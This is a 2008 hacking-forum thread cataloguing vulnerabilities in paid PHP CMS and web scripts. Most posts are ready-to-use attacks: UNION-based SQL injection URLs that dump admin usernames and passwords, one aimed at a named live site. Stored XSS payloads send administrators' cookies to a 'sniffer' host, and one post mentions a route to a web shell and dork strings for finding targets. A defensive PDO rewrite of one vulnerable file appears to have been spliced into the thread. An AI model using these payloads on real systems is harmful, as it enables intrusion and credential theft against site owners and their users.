ANTICHAT Forum

ANTICHAT Forum (https://forum.antichat.xyz/index.php)
-   Scripts/CMF/CMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Overview of vulnerabilities in paid CMS (https://forum.antichat.xyz/showthread.php?t=58123)

.Slip 28.03.2008 22:08

Smart-CMS
 
showNewsItem.php

Exploit:
Code:

showNewsItem.php?news_id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,admin_id,user_name,password)+from+administrator--
Passwords are stored unencrypted
/admin/index.php

chekist 02.04.2008 12:51

Same place:
showGallery.php?pagetitle=Gallery&category=1+and+1=0+union+select+concat(user_name,0x3a,password)+from+administrator/*

.Begemot. 14.06.2008 12:47

Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability
HTML code:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+            Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability        +==--
--==+====================================================================================+==--
                          - dreaming of necessity is reason to comply -


[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com/
[~] EspSeC & Hack0wn!.

[~] Software: Pre Job Board (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch.php

[~] /jobseekers/JobSearch.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,version(),user(),7,8,9,0,1,2,3,4,5/*

* In memory of rgod

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                      JosS                                        +==--
--==+====================================================================================+==--
                                      [+] [The End]

# milw0rm.com [2008-06-14]

Ded MustD!e 19.06.2008 22:15

Passive XSS in ARTUS-master

The search field is vulnerable.

Quote:

"><script>alert()</script>
for example here
Quote:

http://artus.ru/
:)

baltazar 18.07.2008 13:44

CNCat
XSS:
Vulnerabilities in add.php (exploitable both via GET and via POST), index.php and search.php

Code:

http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Code:

http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Code:

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

n0ne 18.07.2008 17:26

Not sure it's a paid CMS, but nevertheless :)

SQL injection in Siteframe CMS

In the folder.php script, id parameter.

Code:

http://site.com/folder.php?id=[sql]
Live example:

Quote:

http://www.myfourthirds.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11+from+users--

Corwin 02.08.2008 10:52

K-Links Directory SQL-INJECTION, XSS
 
================================================================================
|| K-Links Directory SQL-INJECTION, XSS
================================================================================

Application: K-Links Directory
--------------

Website: http://turn-k.net/k-links
-----------

Version: Platinum (All)
----------

About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
------

Googledork: Powered By K-Links Directory
---------------

Demo: http://klinksdemo.com
--------

Date: 24-07-2008
-------

Description:
---------------
Multiple SQL injections. Active and passive XSS.


[ SQL-INJECTION ]

http://host/report/-1[SQL]
http://host/visit.php?id=-1[SQL]
http://host/addreview/-1[SQL]
http://host/refer/-1[SQL]

===>>> Exploit:

http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/*


/* Admin Login - http://host/admin

Then, via Manage Templates, we get a web shell. */

[ ACTIVE XSS ]

*) In the site's search, enter <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

When the administrator views the search queries, his cookies will be sent to a third-party resource.

*) A review can be left on any link. After that, the message will appear for the administrator.

[ PASSIVE XSS :) ]

http://host/index.php?req=login&redirect=&login_message=<script>alert()</script>


Author: Corwin
---------

Contact: corwin88[dog]mail[dot]ru
-----------

p.s. unfortunately I could not find the scripts and conduct a proper code audit.

Corwin 02.08.2008 10:56

================================================================================
|| Dating 3 PHP Script SQL-INJECTION
================================================================================

Application: E-topbiz Dating 3 PHP Script
------------

Version: All
--------

Website: http://e-topbiz.com/oprema/pages/dating3.php
--------

Demo: http://e-topbiz.com/trafficdemos/dating3
-----

About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.
------

Date: 01-08-2008
-----

[ VULNERABLE CODE ]

members/mail.php

@Line:

PHP code:

142:     if($action==inbox) {
143:     $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it");

150:     if($action==veiw) {
151:     $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it");



===>>> Exploit:

http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*



Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------
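
The two queries quoted in the post above splice `$username` and `$mail_id` straight into SQL; the following is an added example (not Corwin's or the vendor's code) showing how the same lookups look with PDO prepared statements and an integer check on `mail_id`. It assumes a PDO connection in `$pdo`, `$username` taken from the authenticated session, and the `mail` table and column names from the post.

```php
<?php
// Added example: hardened rewrite of members/mail.php lines 142-151.
// Assumptions: $pdo is an open PDO connection; $username comes from the
// server-side session, not from the request; table/column names as quoted.

function fetchInbox(PDO $pdo, string $username): array
{
    // The username is bound as a parameter instead of being quoted into the SQL,
    // so a quote character in it cannot terminate the string literal.
    $stmt = $pdo->prepare(
        'SELECT * FROM mail WHERE UserTo = :user ORDER BY SentDate DESC'
    );
    $stmt->execute([':user' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function fetchMessage(PDO $pdo, string $username, $mailId): ?array
{
    // mail_id was an unquoted number in the original query, so anything after
    // the digits became SQL. Reject non-integers before touching the database
    // and bind the value with an explicit integer type.
    if (filter_var($mailId, FILTER_VALIDATE_INT) === false) {
        return null;
    }
    $stmt = $pdo->prepare(
        'SELECT * FROM mail WHERE UserTo = :user AND mail_id = :id'
    );
    $stmt->bindValue(':user', $username, PDO::PARAM_STR);
    $stmt->bindValue(':id', (int) $mailId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Dispatch on a fixed list of actions, comparing against string literals
// rather than the bare constants (inbox, veiw) used in the original.
$action = $_GET['action'] ?? 'inbox';
switch ($action) {
    case 'inbox':
        $result = fetchInbox($pdo, $username);
        break;
    case 'veiw': // misspelling kept so existing links keep working
        $result = fetchMessage($pdo, $username, $_GET['mail_id'] ?? '');
        break;
    default:
        http_response_code(400);
        exit;
}
```

Disabling emulated prepares (`PDO::ATTR_EMULATE_PREPARES => false`) makes MySQL itself parse the statement once and receive the values separately.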

Corwin 02.08.2008 11:38

============================
|| PPVCHAT ACTIVE XSS
============================

Application: PPVCHAT
------------

Website: http://ppvchat.com/
--------

Version: All
--------

About: Pay-per-view adult video chat software. Price 999$.
------

Googledork: Copyright © 2006 PPVChat.com
-----------

Date: 05-07-2008
-----

Description:
------------
There is no filtering of fields when registering new users/models.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>


Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

Corwin 02.08.2008 15:39

================================================================================
|| E-topbiz Payment Processor 2 SQL-INJECTION
================================================================================

Application: E-topbiz Payment Processor 2
------------

Version: 2.0
--------

Website: http://e-topbiz.com/oprema/pages/pproc2.php
--------

Demo: http://e-topbiz.com/trafficdemos/payment2/
-----

About: The payment processor php script allows you to own and operate your very own paypal type payment processor website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.
------

Date: 01-08-2008
-----

[ SQL-INJECTION ]

http://host/shop.htm?cid=-1[SQL]

===>>> Exploit:

http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())



Author: Corwin
-------

Contact: corwin88[dog]mail[dot]ru
--------

